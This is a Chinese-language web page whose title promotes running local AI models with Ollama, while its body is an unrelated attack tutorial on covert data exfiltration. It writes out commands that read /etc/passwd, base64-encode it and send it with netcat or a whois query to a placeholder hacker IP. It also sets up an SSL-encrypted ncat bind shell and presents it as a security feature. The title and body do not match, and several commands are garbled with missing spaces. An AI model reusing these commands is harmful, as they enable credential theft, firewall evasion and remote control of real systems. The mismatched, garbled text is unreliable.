本地AI崛起!Ollama全家桶带你无损运行30+模型
2026/1/7 18:00:39
威胁场景
假设攻击者控制的Kali系统被入侵,需要通过加密方式传输敏感数据以避免被防火墙拦截。
Base64文本传输
场景1:Linux到Windows
目标机器(Linux):
cat/etc/passwd|base64|nc-nv[黑客IP]3333-q1攻击者(Windows/Linux):
nc-l -p3333>kali.txt解密数据: 使用Base64解码工具(如"小葵花")解密接收到的数据。
传输流程:
- 读取敏感文件(/etc/passwd)
- Base64编码加密
- 通过Netcat传输
-q 1参数:传输后1秒自动断开
场景2:文件传输
发送端:
nc-nv[接收方IP]3333<./2.txt -q1接收端:
nc-lp3333>received_file.txtWhois协议隐蔽传输
场景3:双Linux环境
目标机器:
whois -h[黑客IP]-p4444`cat/etc/passwd|base64`攻击者:
nc-l -v -p4444|sed"s/ //g"|base64 -d技术要点:
- 利用Whois协议伪装流量
- 自动去除空格并解码
- 适用于禁止安装Netcat的环境
SSL加密传输
Ncat加密通信
目标机器(被控端):
ncat -cbash--allow[黑客IP]-vnl3333--ssl攻击者:
ncat -nv[目标IP]3333--ssl安全特性:
- SSL/TLS加密:流量完全加密,防止嗅探
- IP白名单:仅允许指定IP连接
- 安全Shell:提供加密的远程Shell访问
Ncat优势:
- Netcat的现代化替代品
- 内置加密支持
- 更强的安全性